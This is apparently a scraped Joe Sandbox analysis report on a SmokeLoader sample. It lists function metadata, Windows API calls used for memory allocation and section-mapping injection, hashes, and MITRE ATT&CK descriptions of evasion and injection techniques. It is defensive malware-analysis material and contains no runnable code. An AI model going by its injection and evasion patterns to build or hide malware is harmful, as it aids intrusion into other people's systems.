Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 0271003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0271024D

Strings

kernel32.dll, xrefs: 0271008F, 02710095
cess, xrefs: 0271018D

Memory Dump Source

Source File: 00000004.00000002.1972746903.0000000002710000.00000040.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2710000_sfjujsr.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: a47d089c2e9bf2e04fae17f13258f11682a27155ab255ab83a8673d89e868fe8
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 74526974A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA95DF14

Function 0274F0D7 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0274F0FF
Module32First.KERNEL32(00000000,00000224), ref: 0274F11F

Memory Dump Source

Source File: 00000004.00000002.1972868127.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_273d000_sfjujsr.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: af3ca703430cd093f829a06d629659fa351cafbf104422ca3d4361e36a2044e8
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: A4F09036200711ABD7303BF9EC8DB6E76E8EF49625F100529E642919C0DFB4E8464A62

Function 02710E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02710223,?,?), ref: 02710E19
SetErrorMode.KERNELBASE(00000000,?,?,02710223,?,?), ref: 02710E1E

Memory Dump Source

Source File: 00000004.00000002.1972746903.0000000002710000.00000040.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2710000_sfjujsr.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 664de3db17252b81f0ea7e26b79c5437e31f658458de95e01fd3d9d479499f59
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: B4D0123114512877DB003A95DC09BCD7B1CDF05B66F008011FB0DD9080C770954046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 32c7949d56d3da8191661db3a38ee65d17f610e0ddd2cc1157d660d2dd35f03b
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: 32c7949d56d3da8191661db3a38ee65d17f610e0ddd2cc1157d660d2dd35f03b
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: ae04734f9b39786081be80ce789597b4a1e39b23fea551aa8062005ff59c2a84
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: ae04734f9b39786081be80ce789597b4a1e39b23fea551aa8062005ff59c2a84
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 5cb1cf3cc1e5bf4755baf7ac3b790f5215e743634697cb06246bb69ab5ac10e7
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: 5cb1cf3cc1e5bf4755baf7ac3b790f5215e743634697cb06246bb69ab5ac10e7
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 137534342241c8c5e645d5a11b5bf708cae17accef258d0ef5f87685d306fe6b
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 137534342241c8c5e645d5a11b5bf708cae17accef258d0ef5f87685d306fe6b
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 0274ED96 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0274EDE7

Memory Dump Source

Source File: 00000004.00000002.1972868127.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_273d000_sfjujsr.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 1988efc42817ae6896a215df9555a8cad00f86bbef770caac67088e10bd4016a
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 54113C79A00208EFDB01DF98C985E99BBF5AF08350F058094F9489B361D771EA90DF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7566c8dc3b7fb910edc6667df7b0a96729b103eb2ec411fa05854360de4f2407
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 7566c8dc3b7fb910edc6667df7b0a96729b103eb2ec411fa05854360de4f2407
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report k8JAXb3Lhs.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\sfjujsr

C:\Users\user\AppData\Roaming\sfjujsr:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
k8JAXb3Lhs.exe

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 0286F737 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 025F003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 025F0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Function 0286F3F6 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON